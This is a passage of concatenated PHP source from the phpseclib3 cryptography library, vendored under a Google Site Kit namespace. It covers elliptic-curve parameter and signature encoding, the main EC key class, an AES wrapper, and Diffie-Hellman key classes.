\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(['namedCurve' => $name], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); } foreach (new \DirectoryIterator(__DIR__ . '/../../Curves/') as $file) { if ($file->getExtension() != 'php') { continue; } $testName = $file->getBasename('.php'); $class = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\' . $testName; $reflect = new \ReflectionClass($class); if ($reflect->isFinal()) { continue; } $candidate = new $class(); switch ($name) { case 'Prime': if (!$candidate instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime) { break; } if (!$candidate->getModulo()->equals($curve->getModulo())) { break; } if ($candidate->getA()->toBytes() != $curve->getA()->toBytes()) { break; } if ($candidate->getB()->toBytes() != $curve->getB()->toBytes()) { break; } list($candidateX, $candidateY) = $candidate->getBasePoint(); list($curveX, $curveY) = $curve->getBasePoint(); if ($candidateX->toBytes() != $curveX->toBytes()) { break; } if ($candidateY->toBytes() != $curveY->toBytes()) { break; } return $returnArray ? ['namedCurve' => $testName] : \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(['namedCurve' => $testName], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); case 'Binary': if (!$candidate instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary) { break; } if ($candidate->getModulo() != $curve->getModulo()) { break; } if ($candidate->getA()->toBytes() != $curve->getA()->toBytes()) { break; } if ($candidate->getB()->toBytes() != $curve->getB()->toBytes()) { break; } list($candidateX, $candidateY) = $candidate->getBasePoint(); list($curveX, $curveY) = $curve->getBasePoint(); if ($candidateX->toBytes() != $curveX->toBytes()) { break; } if ($candidateY->toBytes() != $curveY->toBytes()) { break; } return $returnArray ? ['namedCurve' => $testName] : \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(['namedCurve' => $testName], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); } } } $order = $curve->getOrder(); // we could try to calculate the order thusly: // https://crypto.stackexchange.com/a/27914/4520 // https://en.wikipedia.org/wiki/Schoof%E2%80%93Elkies%E2%80%93Atkin_algorithm if (!$order) { throw new \RuntimeException('Specified Curves need the order to be specified'); } $point = $curve->getBasePoint(); $x = $point[0]->toBytes(); $y = $point[1]->toBytes(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime) { /* * valid versions are: * * ecdpVer1: * - neither the curve or the base point are generated verifiably randomly. * ecdpVer2: * - curve and base point are generated verifiably at random and curve.seed is present * ecdpVer3: * - base point is generated verifiably at random but curve is not. curve.seed is present */ // other (optional) parameters can be calculated using the methods discused at // https://crypto.stackexchange.com/q/28947/4520 $data = ['version' => 'ecdpVer1', 'fieldID' => ['fieldType' => 'prime-field', 'parameters' => $curve->getModulo()], 'curve' => ['a' => $curve->getA()->toBytes(), 'b' => $curve->getB()->toBytes()], 'base' => "\x04" . $x . $y, 'order' => $order]; return $returnArray ? ['specifiedCurve' => $data] : \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(['specifiedCurve' => $data], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); } if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary) { $modulo = $curve->getModulo(); $basis = \count($modulo); $m = \array_shift($modulo); \array_pop($modulo); // the last parameter should always be 0 //rsort($modulo); switch ($basis) { case 3: $basis = 'tpBasis'; $modulo = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($modulo[0]); break; case 5: $basis = 'ppBasis'; // these should be in strictly ascending order (hence the commented out rsort above) $modulo = ['k1' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($modulo[2]), 'k2' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($modulo[1]), 'k3' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($modulo[0])]; $modulo = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($modulo, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Pentanomial::MAP); $modulo = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($modulo); } $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(['m' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($m), 'basis' => $basis, 'parameters' => $modulo], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Characteristic_two::MAP); $params = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($params); $a = \ltrim($curve->getA()->toBytes(), "\x00"); if (!\strlen($a)) { $a = "\x00"; } $b = \ltrim($curve->getB()->toBytes(), "\x00"); if (!\strlen($b)) { $b = "\x00"; } $data = ['version' => 'ecdpVer1', 'fieldID' => ['fieldType' => 'characteristic-two-field', 'parameters' => $params], 'curve' => ['a' => $a, 'b' => $b], 'base' => "\x04" . $x . $y, 'order' => $order]; return $returnArray ? ['specifiedCurve' => $data] : \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(['specifiedCurve' => $data], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); } throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Curve cannot be serialized'); } /** * Use Specified Curve * * A specified curve has all the coefficients, the base points, etc, explicitely included. * A specified curve is a more verbose way of representing a curve */ public static function useSpecifiedCurve() { self::$useNamedCurves = \false; } /** * Use Named Curve * * A named curve does not include any parameters. It is up to the EC parameters to * know what the coefficients, the base points, etc, are from the name of the curve. * A named curve is a more concise way of representing a curve */ public static function useNamedCurve() { self::$useNamedCurves = \true; } } <?php /** * Raw EC Signature Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Signature\Raw as Progenitor; /** * Raw DSA Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Raw extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Signature\Raw { } <?php /** * IEEE P1363 Signature Handler * * PHP version 5 * * Handles signatures in the format described in * https://standards.ieee.org/ieee/1363/2049/ and * https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/sign#ecdsa * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * ASN1 Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class IEEE { /** * Loads a signature * * @param string $sig * @return array */ public static function load($sig) { if (!\is_string($sig)) { return \false; } $len = \strlen($sig); if ($len & 1) { return \false; } $r = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\substr($sig, 0, $len >> 1), 256); $s = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\substr($sig, $len >> 1), 256); return \compact('r', 's'); } /** * Returns a signature in the appropriate format * * @param BigInteger $r * @param BigInteger $s * @param string $curve * @param int $length * @return string */ public static function save(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $s, $curve, $length) { $r = $r->toBytes(); $s = $s->toBytes(); $length = (int) \ceil($length / 8); return \str_pad($r, $length, "\x00", \STR_PAD_LEFT) . \str_pad($s, $length, "\x00", \STR_PAD_LEFT); } } <?php /** * SSH2 Signature Handler * * PHP version 5 * * Handles signatures in the format used by SSH2 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * SSH2 Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SSH2 { /** * Loads a signature * * @param string $sig * @return mixed */ public static function load($sig) { if (!\is_string($sig)) { return \false; } $result = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $sig); if ($result === \false) { return \false; } list($type, $blob) = $result; switch ($type) { // see https://tools.ietf.org/html/rfc5656#section-3.1.2 case 'ecdsa-sha2-nistp256': case 'ecdsa-sha2-nistp384': case 'ecdsa-sha2-nistp521': break; default: return \false; } $result = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ii', $blob); if ($result === \false) { return \false; } return ['r' => $result[0], 's' => $result[1]]; } /** * Returns a signature in the appropriate format * * @param BigInteger $r * @param BigInteger $s * @param string $curve * @return string */ public static function save(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $s, $curve) { switch ($curve) { case 'secp256r1': $curve = 'nistp256'; break; case 'secp384r1': $curve = 'nistp384'; break; case 'secp521r1': $curve = 'nistp521'; break; default: return \false; } $blob = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ii', $r, $s); return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'ecdsa-sha2-' . $curve, $blob); } } <?php /** * ASN1 Signature Handler * * PHP version 5 * * Handles signatures in the format described in * https://tools.ietf.org/html/rfc3279#section-2.2.3 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1 as Encoder; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EcdsaSigValue; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * ASN1 Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ASN1 { /** * Loads a signature * * @param string $sig * @return array */ public static function load($sig) { if (!\is_string($sig)) { return \false; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($sig); if (empty($decoded)) { return \false; } $components = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EcdsaSigValue::MAP); return $components; } /** * Returns a signature in the appropriate format * * @param BigInteger $r * @param BigInteger $s * @return string */ public static function save(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $s) { return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(\compact('r', 's'), \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\EcdsaSigValue::MAP); } } <?php /** * Pure-PHP implementation of EC. * * PHP version 5 * * Here's an example of how to create signatures and verify signatures with this library: * <code> * <?php * include 'vendor/autoload.php'; * * $private = \phpseclib3\Crypt\EC::createKey('secp256k1'); * $public = $private->getPublicKey(); * * $plaintext = 'terrafrost'; * * $signature = $private->sign($plaintext); * * echo $public->verify($plaintext, $signature) ? 'verified' : 'unverified'; * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed448; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\PKCS1; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Parameters; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Pure-PHP implementation of EC. * * @author Jim Wigginton <terrafrost@php.net> */ abstract class EC extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'EC'; /** * Public Key QA * * @var object[] */ protected $QA; /** * Curve * * @var EC\BaseCurves\Base */ protected $curve; /** * Signature Format * * @var string */ protected $format; /** * Signature Format (Short) * * @var string */ protected $shortFormat; /** * Curve Name * * @var string */ private $curveName; /** * Curve Order * * Used for deterministic ECDSA * * @var BigInteger */ protected $q; /** * Alias for the private key * * Used for deterministic ECDSA. AsymmetricKey expects $x. I don't like x because * with x you have x * the base point yielding an (x, y)-coordinate that is the * public key. But the x is different depending on which side of the equal sign * you're on. It's less ambiguous if you do dA * base point = (x, y)-coordinate. * * @var BigInteger */ protected $x; /** * Context * * @var string */ protected $context; /** * Signature Format * * @var string */ protected $sigFormat; /** * Create public / private key pair. * * @param string $curve * @return PrivateKey */ public static function createKey($curve) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } $curve = \strtolower($curve); if (self::$engines['libsodium'] && $curve == 'ed25519' && \function_exists('sodium_crypto_sign_keypair')) { $kp = \sodium_crypto_sign_keypair(); $privatekey = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::loadFormat('libsodium', \sodium_crypto_sign_secretkey($kp)); //$publickey = EC::loadFormat('libsodium', sodium_crypto_sign_publickey($kp)); $privatekey->curveName = 'Ed25519'; //$publickey->curveName = $curve; return $privatekey; } $privatekey = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\PrivateKey(); $curveName = $curve; if (\preg_match('#(?:^curve|^ed)\\d+$#', $curveName)) { $curveName = \ucfirst($curveName); } elseif (\substr($curveName, 0, 10) == 'brainpoolp') { $curveName = 'brainpoolP' . \substr($curveName, 10); } $curve = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\' . $curveName; if (!\class_exists($curve)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Named Curve of ' . $curveName . ' is not supported'); } $reflect = new \ReflectionClass($curve); $curveName = $reflect->isFinal() ? $reflect->getParentClass()->getShortName() : $reflect->getShortName(); $curve = new $curve(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { $arr = $curve->extractSecret(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed448 ? 57 : 32)); $privatekey->dA = $dA = $arr['dA']; $privatekey->secret = $arr['secret']; } else { $privatekey->dA = $dA = $curve->createRandomMultiplier(); } if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519 && self::$engines['libsodium']) { //$r = pack('H*', '0900000000000000000000000000000000000000000000000000000000000000'); //$QA = sodium_crypto_scalarmult($dA->toBytes(), $r); $QA = \sodium_crypto_box_publickey_from_secretkey($dA->toBytes()); $privatekey->QA = [$curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\strrev($QA), 256))]; } else { $privatekey->QA = $curve->multiplyPoint($curve->getBasePoint(), $dA); } $privatekey->curve = $curve; //$publickey = clone $privatekey; //unset($publickey->dA); //unset($publickey->x); $privatekey->curveName = $curveName; //$publickey->curveName = $curveName; if ($privatekey->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return $privatekey->withHash($curve::HASH); } return $privatekey; } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if (!isset($components['dA']) && !isset($components['QA'])) { $new = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Parameters(); $new->curve = $components['curve']; return $new; } $new = isset($components['dA']) ? new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\PrivateKey() : new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\PublicKey(); $new->curve = $components['curve']; $new->QA = $components['QA']; if (isset($components['dA'])) { $new->dA = $components['dA']; $new->secret = $components['secret']; } if ($new->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return $new->withHash($components['curve']::HASH); } return $new; } /** * Constructor * * PublicKey and PrivateKey objects can only be created from abstract RSA class */ protected function __construct() { $this->sigFormat = self::validatePlugin('Signature', 'ASN1'); $this->shortFormat = 'ASN1'; parent::__construct(); } /** * Returns the curve * * Returns a string if it's a named curve, an array if not * * @return string|array */ public function getCurve() { if ($this->curveName) { return $this->curveName; } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { $this->curveName = $this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Curve25519 ? 'Curve25519' : 'Curve448'; return $this->curveName; } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { $this->curveName = $this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 ? 'Ed25519' : 'Ed448'; return $this->curveName; } $params = $this->getParameters()->toString('PKCS8', ['namedCurve' => \true]); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($params); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($decoded); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); if (isset($decoded['namedCurve'])) { $this->curveName = $decoded['namedCurve']; return $decoded['namedCurve']; } if (!$namedCurves) { \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\PKCS1::useSpecifiedCurve(); } return $decoded; } /** * Returns the key size * * Quoting https://tools.ietf.org/html/rfc5656#section-2, * * "The size of a set of elliptic curve domain parameters on a prime * curve is defined as the number of bits in the binary representation * of the field order, commonly denoted by p. Size on a * characteristic-2 curve is defined as the number of bits in the binary * representation of the field, commonly denoted by m. A set of * elliptic curve domain parameters defines a group of order n generated * by a base point P" * * @return int */ public function getLength() { return $this->curve->getLength(); } /** * Returns the current engine being used * * @see self::useInternalEngine() * @see self::useBestEngine() * @return string */ public function getEngine() { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return $this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 && self::$engines['libsodium'] && !isset($this->context) ? 'libsodium' : 'PHP'; } return self::$engines['OpenSSL'] && \in_array($this->hash->getHash(), \openssl_get_md_methods()) ? 'OpenSSL' : 'PHP'; } /** * Returns the public key coordinates as a string * * Used by ECDH * * @return string */ public function getEncodedCoordinates() { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { return \strrev($this->QA[0]->toBytes(\true)); } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { return $this->curve->encodePoint($this->QA); } return "\x04" . $this->QA[0]->toBytes(\true) . $this->QA[1]->toBytes(\true); } /** * Returns the parameters * * @see self::getPublicKey() * @param string $type optional * @return mixed */ public function getParameters($type = 'PKCS1') { $type = self::validatePlugin('Keys', $type, 'saveParameters'); $key = $type::saveParameters($this->curve); return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::load($key, 'PKCS1')->withHash($this->hash->getHash())->withSignatureFormat($this->shortFormat); } /** * Determines the signature padding mode * * Valid values are: ASN1, SSH2, Raw * * @param string $format */ public function withSignatureFormat($format) { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } $new = clone $this; $new->shortFormat = $format; $new->sigFormat = self::validatePlugin('Signature', $format); return $new; } /** * Returns the signature format currently being used * */ public function getSignatureFormat() { return $this->shortFormat; } /** * Sets the context * * Used by Ed25519 / Ed448. * * @see self::sign() * @see self::verify() * @param string $context optional */ public function withContext($context = null) { if (!$this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Only Ed25519 and Ed448 support contexts'); } $new = clone $this; if (!isset($context)) { $new->context = null; return $new; } if (!\is_string($context)) { throw new \InvalidArgumentException('setContext expects a string'); } if (\strlen($context) > 255) { throw new \LengthException('The context is supposed to be, at most, 255 bytes long'); } $new->context = $context; return $new; } /** * Returns the signature format currently being used * */ public function getContext() { return $this->context; } /** * Determines which hashing function should be used * * @param string $hash */ public function withHash($hash) { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException('Montgomery Curves cannot be used to create signatures'); } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519 && $hash != 'sha512') { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Ed25519 only supports sha512 as a hash'); } if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed448 && $hash != 'shake256-912') { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Ed448 only supports shake256 with a length of 114 bytes'); } return parent::withHash($hash); } /** * __toString() magic method * * @return string */ public function __toString() { if ($this->curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { return ''; } return parent::__toString(); } } <?php /** * Pure-PHP implementation of AES. * * Uses mcrypt, if available/possible, and an internal implementation, otherwise. * * PHP version 5 * * NOTE: Since AES.php is (for compatibility and phpseclib-historical reasons) virtually * just a wrapper to Rijndael.php you may consider using Rijndael.php instead of * to save one include_once(). * * If {@link self::setKeyLength() setKeyLength()} isn't called, it'll be calculated from * {@link self::setKey() setKey()}. ie. if the key is 128-bits, the key length will be 128-bits. If it's 136-bits * it'll be null-padded to 192-bits and 192 bits will be the key length until {@link self::setKey() setKey()} * is called, again, at which point, it'll be recalculated. * * Since \phpseclib3\Crypt\AES extends \phpseclib3\Crypt\Rijndael, some functions are available to be called that, in the context of AES, don't * make a whole lot of sense. {@link self::setBlockLength() setBlockLength()}, for instance. Calling that function, * however possible, won't do anything (AES has a fixed block length whereas Rijndael has a variable one). * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $aes = new \phpseclib3\Crypt\AES('ctr'); * * $aes->setKey('abcdefghijklmnop'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $aes->decrypt($aes->encrypt($plaintext)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2008 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; /** * Pure-PHP implementation of AES. * * @author Jim Wigginton <terrafrost@php.net> */ class AES extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Rijndael { /** * Dummy function * * Since \phpseclib3\Crypt\AES extends \phpseclib3\Crypt\Rijndael, this function is, technically, available, but it doesn't do anything. * * @see \phpseclib3\Crypt\Rijndael::setBlockLength() * @param int $length * @throws \BadMethodCallException anytime it's called */ public function setBlockLength($length) { throw new \BadMethodCallException('The block length cannot be set for AES.'); } /** * Sets the key length * * Valid key lengths are 128, 192, and 256. Set the link to bool(false) to disable a fixed key length * * @see \phpseclib3\Crypt\Rijndael:setKeyLength() * @param int $length * @throws \LengthException if the key length isn't supported */ public function setKeyLength($length) { switch ($length) { case 128: case 192: case 256: break; default: throw new \LengthException('Key of size ' . $length . ' not supported by this algorithm. Only keys of sizes 128, 192 or 256 supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Rijndael supports five different key lengths, AES only supports three. * * @see \phpseclib3\Crypt\Rijndael:setKey() * @see setKeyLength() * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (\strlen($key)) { case 16: case 24: case 32: break; default: throw new \LengthException('Key of size ' . \strlen($key) . ' not supported by this algorithm. Only keys of sizes 16, 24 or 32 supported'); } parent::setKey($key); } } <?php /** * DH Parameters * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH; /** * DH Parameters * * @author Jim Wigginton <terrafrost@php.net> */ final class Parameters extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH { /** * Returns the parameters * * @param string $type * @param array $options optional * @return string */ public function toString($type = 'PKCS1', array $options = []) { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); return $type::saveParameters($this->prime, $this->base, $options); } } <?php /** * DH Private Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH; /** * DH Private Key * * @author Jim Wigginton <terrafrost@php.net> */ final class PrivateKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH { use Common\Traits\PasswordProtected; /** * Private Key * * @var \phpseclib3\Math\BigInteger */ protected $privateKey; /** * Public Key * * @var \phpseclib3\Math\BigInteger */ protected $publicKey; /** * Returns the public key * * @return PublicKey */ public function getPublicKey() { $type = self::validatePlugin('Keys', 'PKCS8', 'savePublicKey'); if (!isset($this->publicKey)) { $this->publicKey = $this->base->powMod($this->privateKey, $this->prime); } $key = $type::savePublicKey($this->prime, $this->base, $this->publicKey); return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH::loadFormat('PKCS8', $key); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePrivateKey'); if (!isset($this->publicKey)) { $this->publicKey = $this->base->powMod($this->privateKey, $this->prime); } return $type::savePrivateKey($this->prime, $this->base, $this->privateKey, $this->publicKey, $this->password, $options); } } <?php /** * DH Public Key * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH; /** * DH Public Key * * @author Jim Wigginton <terrafrost@php.net> */ final class PublicKey extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH { use Common\Traits\Fingerprint; /** * Returns the public key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); return $type::savePublicKey($this->prime, $this->base, $this->publicKey, $options); } /** * Returns the public key as a BigInteger * * @return \phpseclib3\Math\BigInteger */ public function toBigInteger() { return $this->publicKey; } } <?php /** * PKCS#8 Formatted DH Key Handler * * PHP version 5 * * Processes keys with the following headers: * * -----BEGIN ENCRYPTED PRIVATE KEY----- * -----BEGIN PRIVATE KEY----- * -----BEGIN PUBLIC KEY----- * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace 